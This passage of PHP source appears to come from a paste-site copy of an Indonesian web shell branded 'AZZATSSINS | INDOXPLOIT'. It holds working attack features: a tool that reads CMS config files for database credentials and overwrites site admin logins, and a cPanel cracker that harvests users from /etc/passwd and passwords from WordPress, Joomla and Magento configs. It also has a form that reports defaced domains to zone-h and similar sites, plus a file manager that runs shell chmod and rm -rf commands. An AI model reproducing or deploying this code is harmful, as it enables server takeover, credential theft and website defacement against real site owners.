  2172.                     echo "Config => ".$file_conf."<br>";
  2173.                     echo "CMS => OpenCart<br>";
  2174.                     echo $url_target;
  2175.                     if(!$update OR !$conn OR !$db) {
  2176.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2177.                     } else {
  2178.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2179.                     }
  2180.                     mysql_close($conn);
  2181.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2182.                     $dbhost = ambilkata($config,'server = "','"');
  2183.                     $dbuser = ambilkata($config,'username = "','"');
  2184.                     $dbpass = ambilkata($config,'password = "','"');
  2185.                     $dbname = ambilkata($config,'database = "','"');
  2186.                     $prefix = "users";
  2187.                     $option = "identitas";
  2188.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2189.                     $db = mysql_select_db($dbname);
  2190.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2191.                     $result = mysql_fetch_array($q);
  2192.                     $target = $result[alamat_website];
  2193.                     if($target == '') {
  2194.                         $target2 = $result[url];
  2195.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2196.                         if($target2 == '') {
  2197.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2198.                         } else {
  2199.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  2200.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2201.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2202.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2203.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2204.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2205.                             } else {
  2206.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2207.                             }
  2208.                         }
  2209.                     } else {
  2210.                         $cek_login = file_get_contents("$target/adminweb/");
  2211.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2212.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2213.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2214.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2215.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2216.                         } else {
  2217.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2218.                         }
  2219.                     }
  2220.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2221.                     echo "Config => ".$file_conf."<br>";
  2222.                     echo "CMS => Lokomedia<br>";
  2223.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2224.                         echo $url_target2;
  2225.                     } else {
  2226.                         echo $url_target;
  2227.                     }
  2228.                     if(!$update OR !$conn OR !$db) {
  2229.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2230.                     } else {
  2231.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2232.                     }
  2233.                     mysql_close($conn);
  2234.                 }
  2235.             }
  2236.         }
  2237.     } else {
  2238.         echo "<center>
  2239.         <h1>Auto Edit User Config</h1>
  2240.         <form method='post'>
  2241.         DIR Config: <br>
  2242.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2243.         Set User & Pass: <br>
  2244.         <input type='text' name='user_baru' value='42247551N5' placeholder='user_baru'><br>
  2245.         <input type='text' name='pass_baru' value='42247551N5' placeholder='pass_baru'><br>
  2246.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2247.         </form>
  2248. <br>
  2249.         ";
  2250.     }
  2251. } elseif($_GET['do'] == 'cpanel') {
  2252.     if($_POST['crack']) {
  2253.         $usercp = explode("\r\n", $_POST['user_cp']);
  2254.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2255.         $i = 0;
  2256.         foreach($usercp as $ucp) {
  2257.             foreach($passcp as $pcp) {
  2258.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2259.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2260.                     } else {
  2261.                         $_SESSION[$ucp] = "1";
  2262.                         $_SESSION[$pcp] = "1";
  2263.                         if($ucp == '' || $pcp == '') {
  2264.                            
  2265.                         } else {
  2266.                             $i++;
  2267.                             if(function_exists('posix_getpwuid')) {
  2268.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  2269.                                 if($domain_cp == '') {
  2270.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  2271.                                 } else {
  2272.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2273.                                     foreach($domains_cp[1] as $dj) {
  2274.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2275.                                         $user_cp_url = $user_cp_url['name'];
  2276.                                         if($user_cp_url == $ucp) {
  2277.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  2278.                                             break;
  2279.                                         }
  2280.                                     }
  2281.                                 }
  2282.                             } else {
  2283.                                 $dom = "<font color=red>function is Disable by system</font>";
  2284.                             }
  2285.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  2286.                         }
  2287.                     }
  2288.                 }
  2289.             }
  2290.         }
  2291.         if($i == 0) {
  2292.         } else {
  2293.             echo "<br>Succes Crack ".$i." Cpanel";
  2294.         }
  2295.     } else {
  2296.         echo "<center>
  2297.         <form method='post'>
  2298.         USER: <br>
  2299.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2300.         $_usercp = fopen("/etc/passwd","r");
  2301.         while($getu = fgets($_usercp)) {
  2302.             if($getu == '' || !$_usercp) {
  2303.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2304.             } else {
  2305.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2306.                 foreach($u[1] as $user_cp) {
  2307.                         if(is_dir("/home/$user_cp/public_html")) {
  2308.                             echo "$user_cp\n";
  2309.                     }
  2310.                 }
  2311.             }
  2312.         }
  2313.         echo "</textarea><br>
  2314.         PASS: <br>
  2315.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2316.         function cp_pass($dir) {
  2317.             $pass = "";
  2318.             $dira = scandir($dir);
  2319.             foreach($dira as $dirb) {
  2320.                 if(!is_file("$dir/$dirb")) continue;
  2321.                 $ambil = file_get_contents("$dir/$dirb");
  2322.                 if(preg_match("/WordPress/", $ambil)) {
  2323.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2324.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2325.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2326.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2327.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2328.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2329.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2330.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2331.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2332.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  2333.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  2334.                     if(preg_match('/"/', $pass1[1])) {
  2335.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2336.                         $pass .= $pass1[1]."\n";
  2337.                     } else {
  2338.                         $pass .= $pass1[1]."\n";
  2339.                     }
  2340.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2341.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2342.                 }
  2343.             }
  2344.             echo $pass;
  2345.         }
  2346.         $cp_pass = cp_pass($dir);
  2347.         echo $cp_pass;
  2348.         echo "</textarea><br>
  2349.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2350.         </form>
  2351. <br></center>";
  2352.     }
  2353. } elseif($_GET['do'] == 'mirror') {
  2354. @ini_set('display_errors', 0);
  2355. echo "
  2356. <center>
  2357. <form method='post'>
  2358.         <u>Defacer</u>: <br>
  2359.         <input style='color:red;background:black;' type='text' name='hekel' size='50' value=''><br>
  2360.         <u>Team</u>: <br>
  2361.         <input style='color:red;background:black;' type='text' name='tim' size='50' value=''><br>
  2362.         <u>Domains</u>: <br>
  2363.         <textarea style='width: 450px; height: 150px;color:red;background:black;'' name='sites'></textarea><br>
  2364.         <input style='color:red;background:black;' type='submit' name='go' value='Submit' style='width: 450px;'>
  2365.         </form><br><font color=silver>";
  2366. $site = explode("\r\n", $_POST['sites']);
  2367. $go = $_POST['go'];
  2368. $hekel = $_POST['hekel'];
  2369. $tim = $_POST['tim'];
  2370. if($go) {
  2371. foreach($site as $sites) {
  2372. $ch3 = curl_init ("http://www.leetszone.com/noti_act.php");
  2373. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  2374. curl_setopt ($ch3, CURLOPT_POST, 1);
  2375. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "hacker=$hekel&team=$tim&url=$sites&poc=Social Engineering");
  2376. curl_exec ($ch3);
  2377. echo "Send to LeetsZone >> Done<br>";
  2378. }
  2379. }
  2380. if($go) {
  2381. foreach($site as $sites) {
  2382. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  2383. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  2384. curl_setopt ($ch3, CURLOPT_POST, 1);
  2385. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$hekel&domain1=$sites&hackmode=1&reason=1");
  2386. curl_exec ($ch3);
  2387. echo "Send to Zone-H >> Done<br>";
  2388. }
  2389. }
  2390.  
  2391. if($go) {
  2392. foreach($site as $sites) {
  2393. $zh = $sites;
  2394. $form_url = "https://www.defacer.id/notify";
  2395. $data_to_post = array();
  2396. $data_to_post['attacker'] = "$hekel";
  2397. $data_to_post['team'] = "$tim";
  2398. $data_to_post['poc'] = 'SQL Injection';
  2399. $data_to_post['url'] = "$zh";
  2400. $curl = curl_init();
  2401. curl_setopt($curl,CURLOPT_URL, $form_url);
  2402. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2403. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2404. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2405. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2406. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2407. curl_exec($curl);
  2408. echo "Send to DefacerID >> Done<br>";
  2409. }
  2410. }
  2411.  
  2412. } elseif($_GET['act'] == 'newfile') {
  2413.     if($_POST['new_save_file']) {
  2414.         $newfile = htmlspecialchars($_POST['newfile']);
  2415.         $fopen = fopen($newfile, "a+");
  2416.         if($fopen) {
  2417.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2418.         } else {
  2419.             $act = "<font color=red>permission denied</font>";
  2420.         }
  2421.     }
  2422.     echo $act;
  2423.     echo "<form method='post'>
  2424.     Filename: <input type='text' name='newfile' value='$dir/azx.php' style='width: 450px;' height='10'>
  2425.     <input type='submit' name='new_save_file' value='Submit'>
  2426.     </form>";
  2427. } elseif($_GET['act'] == 'newfolder') {
  2428.     if($_POST['new_save_folder']) {
  2429.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2430.         if(!mkdir($new_folder)) {
  2431.             $act = "<font color=red>permission denied</font>";
  2432.         } else {
  2433.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2434.         }
  2435.     }
  2436.     echo $act;
  2437.     echo "<form method='post'>
  2438.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2439.     <input type='submit' name='new_save_folder' value='Submit'>
  2440.     </form>";
  2441. } elseif($_GET['act'] == 'rename_dir') {
  2442.     if($_POST['dir_rename']) {
  2443.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2444.         if($dir_rename) {
  2445.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2446.         } else {
  2447.             $act = "<font color=red>permission denied</font>";
  2448.         }
  2449.     echo "".$act."<br>";
  2450.     }
  2451.     echo "<form method='post'>
  2452.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2453.     <input type='submit' name='dir_rename' value='rename'>
  2454.     </form>";
  2455. } elseif($_GET['act'] == 'chmod_dir') {
  2456. echo "<form method=post><input type='text' name='jmbt' value='".$dir."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod' name='azztssns'></form><br>";
  2457. if($_POST['azztssns']) {
  2458. $jmbt = $_POST['jmbt'];
  2459. $kntl = $_POST['kntl'];
  2460. exe("chmod ".$kntl." ".$jmbt);
  2461. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
  2462.  
  2463. }
  2464. } elseif($_GET['act'] == 'delete_dir') {
  2465.     if(is_dir($dir)) {
  2466.         if(is_writable($dir)) {
  2467.             @rmdir($dir);
  2468.             @exe("rm -rf $dir");
  2469.             @exe("rmdir /s /q $dir");
  2470.             rmdir($dir);
  2471.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2472.         } else {
  2473.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2474.         }
  2475.     }
  2476.     echo $act;
  2477. } elseif($_GET['act'] == 'view') {
  2478.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2479.     echo "<fieldset><pre>".htmlspecialchars(@file_get_contents($_GET['file']))."</pre></fieldset>";
  2480. }
  2481. elseif($_GET['act'] == 'chmod') {
  2482. echo "<form method=post><input type='text' name='jmbt' value='".$_GET['file']."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod' name='azztssns'></form><br>";
  2483. if($_POST['azztssns']) {
  2484. $jmbt = $_POST['jmbt'];
  2485. $kntl = $_POST['kntl'];
  2486. exe("chmod ".$kntl." ".$jmbt);
  2487. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
  2488.  
  2489. }
  2490. }
  2491.  elseif($_GET['act'] == 'edit') {
  2492.     if($_POST['save']) {
  2493.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2494.         if($save) {
  2495.             $act = "<font color=lime>Saved!</font>";
  2496.         } else {
  2497.             $act = "<font color=red>permission denied</font>";
  2498.         }
  2499.     echo "".$act."<br>";
  2500.     }
  2501.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2502.     echo "<form method='post'>
  2503.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2504.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  2505.     </form>";
  2506. } elseif($_GET['act'] == 'rename') {
  2507.     if($_POST['do_rename']) {
  2508.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2509.         if($rename) {
  2510.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2511.         } else {
  2512.             $act = "<font color=red>permission denied</font>";
  2513.         }
  2514.     echo "".$act."<br>";
  2515.     }
  2516.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2517.     echo "<form method='post'>
  2518.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2519.     <input type='submit' name='do_rename' value='rename'>
  2520.     </form>";
  2521. } elseif($_GET['act'] == 'delete') {
  2522.     $delete = unlink($_GET['file']);
  2523.     if($delete) {
  2524.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2525.     } else {
  2526.         $act = "<font color=red>permission denied</font>";
  2527.     }
  2528.     echo $act;
  2529. } else {
  2530.     if(is_dir($dir) === true) {
  2531.         if(!is_readable($dir)) {
  2532.             echo "<font color=red>can't open directory. ( not readable )</font>";
  2533.         } else {
  2534.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2535.             <tr>
  2536.             <th class="th_home"><center>Name</center></th>
  2537.             <th class="th_home"><center>Type</center></th>
  2538.             <th class="th_home"><center>Size</center></th>
  2539.             <th class="th_home"><center>Last Modified</center></th>
  2540.             <th class="th_home"><center>Owner/Group</center></th>
  2541.             <th class="th_home"><center>Permission</center></th>
  2542.             <th class="th_home"><center>Action</center></th>
  2543.             </tr>';
  2544.             $scandir = scandir($dir);
  2545.             foreach($scandir as $dirx) {
  2546.                 $dtype = filetype("$dir/$dirx");
  2547.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2548.                 if(function_exists('posix_getpwuid')) {
  2549.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2550.                     $downer = $downer['name'];
  2551.                 } else {
  2552.                     //$downer = $uid;
  2553.                     $downer = fileowner("$dir/$dirx");
  2554.                 }
  2555.                 if(function_exists('posix_getgrgid')) {
  2556.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2557.                     $dgrp = $dgrp['name'];
  2558.                 } else {
  2559.                     $dgrp = filegroup("$dir/$dirx");
  2560.                 }
  2561.                 if(!is_dir("$dir/$dirx")) continue;
  2562.                 if($dirx === '..') {
  2563.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2564.                 } elseif($dirx === '.') {
  2565.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  2566.                 } else {
  2567.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2568.                 }
  2569.                 if($dirx === '.' || $dirx === '..') {
  2570.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2571.                     } else {
  2572.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a> | <a href='?act=chmod_dir&dir=$dir/$dirx'>chmod</a>";
  2573.                 }
  2574.                 echo "<tr>";
  2575.                 echo "<td class='td_home'>$href</td>";
  2576.                 echo "<td class='td_home'><center>$dtype</center></td>";
  2577.                 echo "<td class='td_home'><center>-</center></th></td>";
  2578.                 echo "<td class='td_home'><center>$dtime</center></td>";
  2579.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2580.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2581.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2582.                 echo "</tr>";
  2583.             }
  2584.         }
  2585.     } else {
  2586.         echo "<font color=red>can't open directory.</font>";
  2587.     }
  2588.         foreach($scandir as $file) {
  2589.             $ftype = filetype("$dir/$file");
  2590.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2591.             $size = filesize("$dir/$file")/1024;
  2592.             $size = round($size,3);
  2593.             if(function_exists('posix_getpwuid')) {
  2594.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2595.                 $fowner = $fowner['name'];
  2596.             } else {
  2597.                 //$downer = $uid;
  2598.                 $fowner = fileowner("$dir/$file");
  2599.             }
  2600.             if(function_exists('posix_getgrgid')) {
  2601.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2602.                 $fgrp = $fgrp['name'];
  2603.             } else {
  2604.                 $fgrp = filegroup("$dir/$file");
  2605.             }
  2606.             if($size > 1024) {
  2607.                 $size = round($size/1024,2). 'MB';
  2608.             } else {
  2609.                 $size = $size. 'KB';
  2610.             }
  2611.             if(!is_file("$dir/$file")) continue;
  2612.             echo "<tr>";
  2613.             echo "<td class='td_home'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2614.             echo "<td class='td_home'><center>$ftype</center></td>";
  2615.             echo "<td class='td_home'><center>$size</center></td>";
  2616.             echo "<td class='td_home'><center>$ftime</center></td>";
  2617.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2618.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2619.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2620.             echo "</tr>";
  2621.         }
  2622.         echo "</table>";
  2623.         if(!is_readable($dir)) {
  2624.             //
  2625.         } else {
  2626.             echo "<hr>";
  2627.         }
  2628. }
  2629.     echo "<center><br><br><b><i><fieldset><font color=lime size=-20><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS | INDOXPLOIT</a></font></fieldset></i></b></center>";
  2630. ?>
Add Comment
Please, Sign In to add comment